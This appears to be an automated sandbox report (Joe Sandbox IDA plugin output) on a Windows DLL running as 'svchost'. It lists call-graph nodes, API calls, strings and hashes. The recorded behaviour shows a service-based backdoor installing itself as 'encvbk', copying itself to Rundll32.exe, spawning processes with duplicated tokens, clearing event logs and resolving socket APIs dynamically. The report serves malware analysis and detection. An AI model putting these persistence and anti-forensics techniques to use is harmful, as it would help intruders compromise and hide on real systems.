1639->1637 1643 1000160d __EH_prolog 1642->1643 1644 10001672 1643->1644 1645 1000162c memcmp 1643->1645 1646 1000104c 6 API calls 1644->1646 1645->1644 1647 10001641 1645->1647 1657 10001680 1646->1657 1649 10001863 16 API calls 1647->1649 1648 10001661 1648->1635 1649->1648 1650 10001697 memcpy memcmp 1651 100016b9 _CxxThrowException 1650->1651 1650->1657 1651->1657 1652 100016da memcpy 1652->1648 1652->1657 1653 100010cf 6 API calls 1653->1657 1656 100017bd _CxxThrowException 1658 100017e2 1656->1658 1659 100017d9 ??3@YAXPAX 1656->1659 1657->1648 1657->1650 1657->1652 1657->1653 1657->1656 1663 100017a4 ??3@YAXPAX ??3@YAXPAX 1657->1663 1665 100012a4 VirtualFree 1657->1665 1668 1000104c 6 API calls 1657->1668 1670 100010cf 1657->1670 1660 100017f0 1658->1660 1661 100017e7 ??3@YAXPAX 1658->1661 1659->1658 1662 100012a4 VirtualFree 1660->1662 1661->1660 1664 100017fb 1662->1664 1663->1657 1666 10001863 16 API calls 1664->1666 1665->1657 1667 10001804 1666->1667 1667->1635 1668->1657 1669->1640 1672 100010d8 1670->1672 1671 100010e0 ??2@YAPAXI ??2@YAPAXI 1671->1656 1671->1657 1672->1671 1673 100010fc memcpy 1672->1673 1674 10001117 1672->1674 1673->1674 1676 100011fb 1674->1676 1677 1000120a 1676->1677 1678 10001211 ceil _ftol 1677->1678 1682 10001243 1677->1682 1679 1000123f 1678->1679 1680 10001247 VirtualAlloc 1679->1680 1679->1682 1681 10001262 1680->1681 1680->1682 1683 10001270 memcpy 1681->1683 1684 1000127d VirtualFree 1681->1684 1682->1671 1683->1684 1684->1682 1685 100024ac printf 1686 100024c4 printf 1685->1686 1688 100024d3 1685->1688 1687 1000257f 1686->1687 1689 100024ef memset memcpy ??2@YAPAXI memcpy 1688->1689 1700 1000389d 1689->1700 1692 10002540 1713 10003cd2 1692->1713 1693 10002532 printf 1699 10002559 1693->1699 1696 10002560 ??3@YAXPAX 1697 10002567 printf 1696->1697 1697->1687 1698 10003d5d 5 API calls 1698->1699 1699->1696 1699->1697 1701 100038b3 1700->1701 1711 10002526 1700->1711 1702 100038c4 VirtualAlloc 1701->1702 1701->1711 1703 100038e1 VirtualAlloc 1702->1703 1704 100038f5 GetProcessHeap HeapAlloc VirtualAlloc VirtualAlloc memcpy 1702->1704 1703->1704 1703->1711 1705 100039ba 4 API calls 1704->1705 1706 10003961 1705->1706 1707 10003b9e 6 API calls 1706->1707 1708 1000397d 1707->1708 1710 10003a67 2 API calls 1708->1710 1712 10003988 1708->1712 1709 10003d5d 5 API calls 1709->1711 1710->1712 1711->1692 1711->1693 1712->1709 1712->1711 1715 1000254b 1713->1715 1716 10003cee 1713->1716 1714 10003d15 _stricmp 1714->1715 1714->1716 1715->1698 1716->1714 1716->1715 1717 1000246d 1720 100023fa printf 1717->1720 1721 1000389d 24 API calls 1720->1721 1722 10002414 1721->1722 1723 10002429 1722->1723 1724 1000241c OutputDebugStringA 1722->1724 1726 10003cd2 _stricmp 1723->1726 1725 10002448 printf 1724->1725 1728 10002468 1725->1728 1729 10002458 VirtualFree 1725->1729 1727 10002434 1726->1727 1730 10003d5d 5 API calls 1727->1730 1729->1728 1731 10002445 1730->1731 1731->1725 1262 1000336e strncpy wcstombs RegisterServiceCtrlHandlerA 1263 10003585 1262->1263 1264 100033c6 FreeConsole 1262->1264 1282 1000318a SetServiceStatus 1264->1282 1266 100033d6 1283 1000318a SetServiceStatus 1266->1283 1268 100033df GetVersionExA 1269 10003566 Sleep 1268->1269 1270 10003406 1268->1270 1269->1263 1271 10003578 1269->1271 1272 10003419 8 API calls 1270->1272 1273 1000340f MainThread 1270->1273 1271->1263 1271->1269 1274 100034aa GetLastError 1272->1274 1275 100034cb GetModuleFileNameA wsprintfA 1272->1275 1273->1269 1274->1275 1276 100034b5 wsprintfA 1274->1276 1277 10003507 Sleep GetExitCodeProcess 1275->1277 1276->1275 1278 10003526 CloseHandle Sleep 1277->1278 1281 10003544 1277->1281 1284 10001fbd 7 API calls 1278->1284 1280 10003556 WaitForSingleObject CloseHandle 1280->1269 1281->1277 1281->1280 1282->1266 1283->1268 1285 100020b1 1284->1285 1286 10002059 SetTokenInformation 1284->1286 1288 100020c1 1285->1288 1289 100020b8 FreeLibrary 1285->1289 1290 10002079 CreateProcessAsUserA CloseHandle CloseHandle 1286->1290 1288->1281 1289->1288 1290->1285 1732 1000386e 1737 1000388a CloseHandle 1732->1737 1734 10003876 1735 10003884 1734->1735 1736 1000387d ??3@YAXPAX 1734->1736 1736->1735 1737->1734 1738 10003134 1743 10001e37 1738->1743 1763 10004c68 1743->1763 1745 10001e41 wsprintfA 1764 10001b5b OpenSCManagerA 1745->1764 1748 10004a93 9 API calls 1749 10001ede memset lstrcpyA lstrlenA 1748->1749 1750 10004a93 9 API calls 1749->1750 1751 10001f23 1750->1751 1776 10001a43 OpenSCManagerA 1751->1776 1754 1000304f wsprintfA strlen 1755 1000308c strlen 1754->1755 1756 100030ad strlen 1754->1756 1758 10004a93 9 API calls 1755->1758 1757 10004a93 9 API calls 1756->1757 1759 100030d0 GetLocalTime wsprintfA strlen 1757->1759 1760 100030aa 1758->1760 1761 10004a93 9 API calls 1759->1761 1760->1756 1762 1000312c 1761->1762 1763->1745 1765 10001ba3 _local_unwind2 1764->1765 1766 10001bb8 CreateServiceA 1764->1766 1767 10001e06 wsprintfA strlen 1765->1767 1768 10001c25 ChangeServiceConfig2A ChangeServiceConfig2A wsprintfA strlen 1766->1768 1769 10001bf5 GetLastError 1766->1769 1767->1748 1770 10004a93 9 API calls 1768->1770 1769->1768 1771 10001c02 OpenServiceA 1769->1771 1772 10001dea StartServiceA 1770->1772 1773 10001c1c StartServiceA 1771->1773 1774 10001dfa 1771->1774 1772->1774 1773->1768 1788 10001e1d 1774->1788 1777 10001a60 OpenServiceA 1776->1777 1778 10001ac8 1776->1778 1779 10001ac1 1777->1779 1780 10001a75 StartServiceA 1777->1780 1778->1754 1781 10001ac2 CloseServiceHandle 1779->1781 1780->1778 1782 10001a84 GetLastError 1780->1782 1781->1778 1783 10001a91 CloseServiceHandle 1782->1783 1784 10001a9b QueryServiceStatus 1782->1784 1783->1781 1785 10001aba CloseServiceHandle 1784->1785 1786 10001aaa 1784->1786 1785->1779 1786->1785 1787 10001ab0 Sleep 1786->1787 1787->1784 1789 10001e21 CloseServiceHandle 1788->1789 1790 10001e28 1788->1790 1789->1790 1791 10001e36 1790->1791 1792 10001e2d CloseServiceHandle 1790->1792 1791->1767 1792->1791 1793 10002d74 1794 10002d79 1793->1794 1797 10004d20 1794->1797 1800 10004cf4 1797->1800 1799 10002d92 1801 10004d09 __dllonexit 1800->1801 1802 10004cfd _onexit 1800->1802 1801->1799 1802->1799 1803 10002d35 strrchr 1804 10002d70 1803->1804 1805 10002d49 1803->1805 1806 10004529 12 API calls 1805->1806 1807 10002d53 1806->1807 1807->1804 1808 1000248b 2 API calls 1807->1808 1809 10002d5f 1808->1809 1809->1804 1812 1000273d GetModuleFileNameA 1809->1812 1811 10002d6a 1813 10002764 wsprintfA 1812->1813 1814 10002785 wsprintfA 1812->1814 1815 100027a1 WinExec 1813->1815 1814->1815 1815->1811 1816 10003df6 1821 10003e12 1816->1821 1819 10003e05 ??3@YAXPAX 1820 10003e0c 1819->1820 1822 10003e29 FreeLibrary 1821->1822 1823 10003e2c 1821->1823 1822->1823 1824 10003e33 FreeLibrary 1823->1824 1825 10003e36 1823->1825 1824->1825 1826 10003e40 1825->1826 1827 10003e3d FreeLibrary 1825->1827 1828 10003e47 FreeLibrary 1826->1828 1829 10003e4a 1826->1829 1827->1826 1828->1829 1830 10003e51 FreeLibrary 1829->1830 1831 10003e54 1829->1831 1830->1831 1832 10003e5b FreeLibrary 1831->1832 1833 10003dfe 1831->1833 1832->1833 1833->1819 1833->1820 1834 100032f7 1835 10003347 1834->1835 1836 100032ff 1834->1836 1852 1000318a SetServiceStatus 1835->1852 1838 10003302 1836->1838 1839 10003335 1836->1839 1841 1000331b 1838->1841 1843 10003305 1838->1843 1851 1000318a SetServiceStatus 1839->1851 1840 10003353 Sleep 1840->1843 1849 1000318a SetServiceStatus 1841->1849 1846 10003330 1843->1846 1853 1000318a SetServiceStatus 1843->1853 1845 10003327 1850 1000318a SetServiceStatus 1845->1850 1849->1845 1850->1846 1851->1845 1852->1840 1853->1846 1854 10002f7b 1855 10001acf 8 API calls 1854->1855 1856 10002f90 1855->1856 1857 10003043 1856->1857 1865 100020c8 6 API calls 1856->1865 1859 10002f9f wsprintfA CreateProcessA GetModuleFileNameA GetFileAttributesA 1860 10003013 1859->1860 1861 10003018 GetLastError 1860->1861 1862 1000303d 1860->1862 1861->1862 1863 10003023 Sleep GetFileAttributesA 1861->1863 1864 10001a43 9 API calls 1862->1864 1863->1860 1864->1857 1865->1859 1866 100021ff 1867 10002216 1866->1867 1899 10002239 1866->1899 1868 1000235f VirtualAlloc 1867->1868 1869 1000221f 1867->1869 1870 1000237e memcpy 1868->1870 1868->1899 1871 100022c0 1869->1871 1872 10002284 1869->1872 1873 10002308 1869->1873 1874 100022aa 1869->1874 1875 1000223e 1869->1875 1876 1000222f 1869->1876 1877 100022cf 1869->1877 1878 10002251 1869->1878 1879 10002312 VirtualAlloc 1869->1879 1880 10002293 1869->1880 1881 10002353 1869->1881 1882 100022b5 1869->1882 1883 1000229f 1869->1883 1869->1899 1960 100042ee CreateEventA _beginthreadex WaitForSingleObject CloseHandle 1870->1960 1949 100042ee CreateEventA _beginthreadex WaitForSingleObject CloseHandle 1871->1949 1912 10002bc3 strlen 1872->1912 1950 10002583 1873->1950 1933 10002b96 1874->1933 1906 100026df wsprintfA 1875->1906 1901 100025a2 1876->1901 1944 1000260e LocalAlloc 1877->1944 1911 100042ee CreateEventA _beginthreadex WaitForSingleObject CloseHandle 1878->1911 1887 10002330 memcpy 1879->1887 1879->1899 1889 1000273d 4 API calls 1880->1889 1955 1000265e 1881->1955 1939 10002b58 EnumWindows 1882->1939 1922 100029b6 memcpy CreateFileA 1883->1922 1897 100023fa 29 API calls 1887->1897 1889->1899 1896 10002264 Sleep 1896->1899 1897->1899 1961 10004666 6 API calls 1901->1961 1904 10004666 11 API calls 1905 100025c6 1904->1905 1905->1899 1907 10002713 strlen 1906->1907 1908 1000270e 1906->1908 1909 10004a93 9 API calls 1907->1909 1908->1907 1910 10002737 1909->1910 1910->1899 1911->1896 1913 10002c90 1912->1913 1914 10002bdf memset 1912->1914 1913->1899 1915 10004822 13 API calls 1914->1915 1916 10002c10 1915->1916 1916->1913 1917 10002c17 lstrlenA 1916->1917 1917->1913 1918 10002c28 strstr 1917->1918 1918->1913 1919 10002c40 lstrcpyA 1918->1919 1920 10002c60 CreateProcessA 1919->1920 1920->1913 1923 10002a32 1922->1923 1924 10002a12 WriteFile 1922->1924 1923->1899 1924->1923 1925 10002a39 CloseHandle strlen 1924->1925 1926 10002a51 wsprintfA 1925->1926 1927 10002a76 lstrcpyA 1925->1927 1928 10002a8a 1926->1928 1927->1928 1929 10002aa9 1928->1929 1930 10002a97 1928->1930 1970 100027bc memset strrchr 1929->1970 1930->1923 1932 1000273d 4 API calls 1930->1932 1932->1923 1989 1000473f LoadLibraryA GetProcAddress GetProcAddress GetProcAddress 1933->1989 1936 10002bbf 1936->1899 1937 10001863 16 API calls 1938 10002bba 1937->1938 1938->1899 1940 10002b74 1939->1940 1941 10002b8b 1939->1941 1996 10002ac4 IsWindowVisible 1939->1996 1942 10001863 16 API calls 1940->1942 1941->1899 1943 10002b86 1942->1943 1943->1899 1945 10002622 memcpy LocalSize 1944->1945 1946 1000265c 1944->1946 1947 10001863 16 API calls 1945->1947 1946->1899 1948 1000264d Sleep LocalFree 1947->1948 1948->1946 1949->1899 1951 1000258c 1950->1951 1952 1000259f 1950->1952 1953 10003cd2 _stricmp 1951->1953 1952->1899 1954 10002597 1953->1954 1954->1899 1958 10002680 1955->1958 1956 100026b4 OpenEventLogA 1957 100026c4 ClearEventLogA CloseEventLog 1956->1957 1956->1958 1957->1958 1958->1956 1959 100026da 1958->1959 1959->1899 1960->1899 1963 100046c3 1961->1963 1962 100025b0 ExitWindowsEx 1962->1904 1963->1962 1964 100046fc LoadLibraryA GetProcAddress 1963->1964 1965 1000470d CloseHandle 1964->1965 1967 10004728 FreeLibrary 1965->1967 1968 1000472b 1965->1968 1967->1968 1968->1962 1969 10004731 FreeLibrary 1968->1969 1969->1962 1971 100027f6 strrchr 1970->1971 1972 100028f3 1970->1972 1973 10002846 strcpy 1971->1973 1974 1000281d strlen 1971->1974 1972->1923 1975 10002857 1973->1975 1976 10002827 1974->1976 1977 10004822 13 API calls 1975->1977 1976->1975 1979 10002832 strncpy 1976->1979 1978 10002875 1977->1978 1978->1972 1980 1000287c memset wsprintfA memset 1978->1980 1979->1975 1981 10004822 13 API calls 1980->1981 1982 100028ec 1981->1982 1982->1972 1983 100028fa ExpandEnvironmentStringsA strstr 1982->1983 1984 10002929 strstr 1983->1984 1985 1000295f lstrcpyA 1983->1985 1984->1985 1986 1000293d lstrcatA lstrcatA 1984->1986 1987 10002969 CreateProcessA 1985->1987 1986->1987 1987->1972 1995 10004788 1989->1995 1990 100047cf CloseHandle 1991 10002ba3 1990->1991 1992 100047da FreeLibrary 1990->1992 1991->1936 1991->1937 1992->1991 1993 100047a7 lstrcmpiA 1994 100047c8 1993->1994 1993->1995 1994->1990 1995->1990 1995->1993 1997 10002b43 1996->1997 1998 10002ada SendMessageA lstrlenA 1996->1998 1998->1997 1999 10002b1d _strupr _strupr strstr 1998->1999 1999->1997

                                                                                          Executed Functions

                                                                                          Function 10003E6B Relevance: 248.8, APIs: 71, Strings: 71, Instructions: 296libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,1000383C,10004E5A,?,?,?,?,?,?), ref: 10003E85
                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 10003E96
                                                                                          • GetProcAddress.KERNEL32(74DD0000,GetModuleFileNameA), ref: 10003EA3
                                                                                          • GetProcAddress.KERNEL32(74DD0000,CreateMutexA), ref: 10003EB0
                                                                                          • GetProcAddress.KERNEL32(74DD0000,ReleaseMutex), ref: 10003EBD
                                                                                          • GetProcAddress.KERNEL32(74DD0000,GetLastError), ref: 10003ECA
                                                                                          • GetProcAddress.KERNEL32(74DD0000,CloseHandle), ref: 10003ED7
                                                                                          • GetProcAddress.KERNEL32(74DD0000,Sleep), ref: 10003EE4
                                                                                          • GetProcAddress.KERNEL32(74DD0000,lstrcatA), ref: 10003EF1
                                                                                          • GetProcAddress.KERNEL32(74DD0000,GetTickCount), ref: 10003EFE
                                                                                          • GetProcAddress.KERNEL32(74DD0000,WaitForSingleObject), ref: 10003F0B
                                                                                          • GetProcAddress.KERNEL32(74DD0000,GetFileAttributesA), ref: 10003F18
                                                                                          • GetProcAddress.KERNEL32(74DD0000,CreateEventA), ref: 10003F25
                                                                                          • GetProcAddress.KERNEL32(74DD0000,ResetEvent), ref: 10003F32
                                                                                          • GetProcAddress.KERNEL32(74DD0000,CancelIo), ref: 10003F3F
                                                                                          • GetProcAddress.KERNEL32(74DD0000,SetEvent), ref: 10003F4C
                                                                                          • GetProcAddress.KERNEL32(74DD0000,TerminateThread), ref: 10003F59
                                                                                          • GetProcAddress.KERNEL32(74DD0000,GetVersionExA), ref: 10003F66
                                                                                          • GetProcAddress.KERNEL32(74DD0000,GetExitCodeProcess), ref: 10003F73
                                                                                          • GetProcAddress.KERNEL32(74DD0000,ExpandEnvironmentStringsA), ref: 10003F80
                                                                                          • GetProcAddress.KERNEL32(74DD0000,GetSystemInfo), ref: 10003F8D
                                                                                          • GetProcAddress.KERNEL32(74DD0000,GetSystemDirectoryA), ref: 10003F9A
                                                                                          • GetProcAddress.KERNEL32(74DD0000,MoveFileA), ref: 10003FA7
                                                                                          • GetProcAddress.KERNEL32(74DD0000,MoveFileExA), ref: 10003FB4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                          • String ID: ADVAPI32.dll$CancelIo$ChangeServiceConfig2A$CloseHandle$CloseServiceHandle$ControlService$CreateEventA$CreateMutexA$CreateProcessA$CreateProcessAsUserA$CreateServiceA$DeleteService$DuplicateTokenEx$EnumWindows$ExitWindowsEx$ExpandEnvironmentStringsA$GetCurrentProcess$GetExitCodeProcess$GetFileAttributesA$GetLastError$GetModuleFileNameA$GetSystemDirectoryA$GetSystemInfo$GetTickCount$GetVersionExA$IsWindowVisible$MSVCRT.dll$MessageBoxA$MoveFileA$MoveFileExA$OpenProcessToken$OpenSCManagerA$OpenServiceA$QueryServiceStatus$RegisterServiceCtrlHandlerA$ReleaseMutex$ResetEvent$SendMessageA$SetEvent$SetServiceStatus$SetTokenInformation$Sleep$StartServiceA$TerminateThread$User32.dll$WSACleanup$WSAIoctl$WSAStartup$WTSGetActiveConsoleSessionId$WaitForSingleObject$closesocket$connect$gethostbyname$gethostname$getsockname$htons$kernel32.dll$lstrcatA$memcpy$memset$recv$select$send$setsockopt$socket$strcmp$strlen$strstr$wininet.dll$ws2_32.dll$wsprintfA
                                                                                          • API String ID: 2238633743-2593546367
                                                                                          • Opcode ID: c0ece4e7efd5b4c6edabd0fb5669f7d958223cf09bcca4ca1208277cbc57487f
                                                                                          • Instruction ID: 1d4e4a84f7054c9bea1b663399dca5a43fab5260fb22e9cb011038ddc9d5f956
                                                                                          • Opcode Fuzzy Hash: c0ece4e7efd5b4c6edabd0fb5669f7d958223cf09bcca4ca1208277cbc57487f
                                                                                          • Instruction Fuzzy Hash: F5B16970800B45AEE731AF32CD04EA7BEF6FF84340B118D2DE5AA56924DB32A855DF51
                                                                                          Function 1000336E Relevance: 50.9, APIs: 25, Strings: 4, Instructions: 150stringsleepregistryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • strncpy.MSVCRT ref: 1000338C
                                                                                          • wcstombs.MSVCRT ref: 1000339C
                                                                                          • RegisterServiceCtrlHandlerA.ADVAPI32(?,100032F7), ref: 100033B1
                                                                                          • FreeConsole.KERNEL32 ref: 100033C6
                                                                                            • Part of subcall function 1000318A: SetServiceStatus.SECHOST(00000010), ref: 100031CA
                                                                                          • GetVersionExA.KERNEL32(?), ref: 100033F3
                                                                                          • MainThread.6795234 ref: 1000340F
                                                                                            • Part of subcall function 1000315D: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10003178
                                                                                            • Part of subcall function 1000315D: CloseHandle.KERNEL32(00000000), ref: 1000317F
                                                                                          • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 10003426
                                                                                          • lstrcatA.KERNEL32(?,1000660C), ref: 10003438
                                                                                          • lstrcatA.KERNEL32(?,encvbk), ref: 1000344A
                                                                                          • lstrcatA.KERNEL32(?,.exe), ref: 1000345C
                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000346A
                                                                                          • lstrcatA.KERNEL32(?,\Rundll32.exe), ref: 1000347C
                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 10003492
                                                                                          • GetFileAttributesA.KERNELBASE(?), ref: 1000349F
                                                                                          • GetLastError.KERNEL32 ref: 100034AA
                                                                                          • wsprintfA.USER32 ref: 100034C3
                                                                                          • GetModuleFileNameA.KERNEL32(?,00000104), ref: 100034DE
                                                                                          • wsprintfA.USER32 ref: 100034FE
                                                                                          • Sleep.KERNELBASE(000003E8), ref: 1000350C
                                                                                          • GetExitCodeProcess.KERNELBASE(00000000,?), ref: 10003517
                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 10003527
                                                                                          • Sleep.KERNELBASE(00000BB8), ref: 10003532
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10003559
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 10003560
                                                                                          • Sleep.KERNEL32(00000064), ref: 10003568
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: lstrcat$CloseFileHandleSleep$DirectoryObjectServiceSingleWaitwsprintf$AttributesCodeConsoleCopyCtrlCurrentErrorExitFreeHandlerLastMainModuleNameProcessRegisterStatusSystemThreadVersionstrncpywcstombs
                                                                                          • String ID: %s "%s",MainThread$.exe$\Rundll32.exe$encvbk
                                                                                          • API String ID: 2268562214-3132388857
                                                                                          • Opcode ID: edc6bb86fa15e14382b8bf422a5a5e13054f2286661d091575d839084948f042
                                                                                          • Instruction ID: 41d25408302aabc459f6968b7f59f59ff79b25a4c4978eb5c8748b31ff7b5c46
                                                                                          • Opcode Fuzzy Hash: edc6bb86fa15e14382b8bf422a5a5e13054f2286661d091575d839084948f042
                                                                                          • Instruction Fuzzy Hash: 06515275800269AFEB11DBA0CCC99DF77BEEB09395F604465F209D2058DB719A84CF61
                                                                                          Function 10001FBD Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 98libraryprocessloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • LoadLibraryA.KERNELBASE(userenv.dll,00000000,00000104,00000000), ref: 10001FCB
                                                                                          • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 10001FDA
                                                                                          • memset.MSVCRT ref: 10001FF9
                                                                                          • memset.MSVCRT ref: 10002005
                                                                                          • GetCurrentProcess.KERNEL32 ref: 10002023
                                                                                          • OpenProcessToken.ADVAPI32(00000000,000F01FF,10003544), ref: 10002033
                                                                                          • DuplicateTokenEx.ADVAPI32(10003544,02000000,00000000,00000001,00000001,?), ref: 1000204A
                                                                                          • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 10002069
                                                                                          • CreateProcessAsUserA.KERNELBASE(?,00000000,10003544,00000000,00000000,00000000,00000430,?,00000000,?,?), ref: 10002094
                                                                                          • CloseHandle.KERNEL32(?), ref: 100020A0
                                                                                          • CloseHandle.KERNEL32(10003544), ref: 100020A9
                                                                                          • FreeLibrary.KERNELBASE(?), ref: 100020BB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$CloseHandleLibrarymemset$AddressCreateCurrentDuplicateFreeInformationLoadOpenProcUser
                                                                                          • String ID: CreateEnvironmentBlock$WinSta0\Default$userenv.dll
                                                                                          • API String ID: 389336417-1779146383
                                                                                          • Opcode ID: b17ba00ba64db28f18bd6f450c5a4aff0af55f28d04f5de357443b33628a04c7
                                                                                          • Instruction ID: 393253a686a726e0e40b90c7e54b6c9b8ea898aa750e1207ba5c491074f34e4f
                                                                                          • Opcode Fuzzy Hash: b17ba00ba64db28f18bd6f450c5a4aff0af55f28d04f5de357443b33628a04c7
                                                                                          • Instruction Fuzzy Hash: E13104B2D11229BBEB11DFD5CD89DDEBFBAEF08781F200056F605A2154C7B15A00DBA0
                                                                                          Function 1000318A Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 34 1000318a-100031d1 SetServiceStatus
                                                                                          APIs
                                                                                          • SetServiceStatus.SECHOST(00000010), ref: 100031CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ServiceStatus
                                                                                          • String ID:
                                                                                          • API String ID: 3969395364-0
                                                                                          • Opcode ID: 27465d0ccf9c2ca7f2eb77ed8655f8ffd3fcd3240fb6f93fded1e015b92d134b
                                                                                          • Instruction ID: 42df913d68a79b1f62ab0f840a1365e4bfcb694bfd220718bb7b564d1378dfbb
                                                                                          • Opcode Fuzzy Hash: 27465d0ccf9c2ca7f2eb77ed8655f8ffd3fcd3240fb6f93fded1e015b92d134b
                                                                                          • Instruction Fuzzy Hash: 24F0A5B0D0021EDFDB40DF99D8857AEBBF4BB08348F108069E818A7244D7B496048F90

                                                                                          Non-executed Functions

                                                                                          Function 1000304F Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 85stringtimeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • wsprintfA.USER32 ref: 1000306C
                                                                                          • strlen.MSVCRT ref: 10003078
                                                                                          • strlen.MSVCRT ref: 1000308E
                                                                                            • Part of subcall function 10004A93: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,00000000,?), ref: 10004AC0
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 10004AD7
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 10004AE2
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 10004AED
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 10004AF8
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 10004B03
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 10004B0E
                                                                                            • Part of subcall function 10004A93: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 10004C02
                                                                                          • strlen.MSVCRT ref: 100030B4
                                                                                          • GetLocalTime.KERNEL32(?), ref: 100030D7
                                                                                          • wsprintfA.USER32 ref: 100030FF
                                                                                          • strlen.MSVCRT ref: 1000310D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$strlen$Librarywsprintf$FreeLoadLocalTime
                                                                                          • String ID: %4d-%.2d-%.2d %.2d:%.2d$Default$Group$InstallTime$Remark$SYSTEM\CurrentControlSet\Services\%s$encvbk
                                                                                          • API String ID: 124699875-3400510970
                                                                                          • Opcode ID: 01154ca105bfda5f078472489b81bc39b1063e4cdbc4f1aa553d48ab01563500
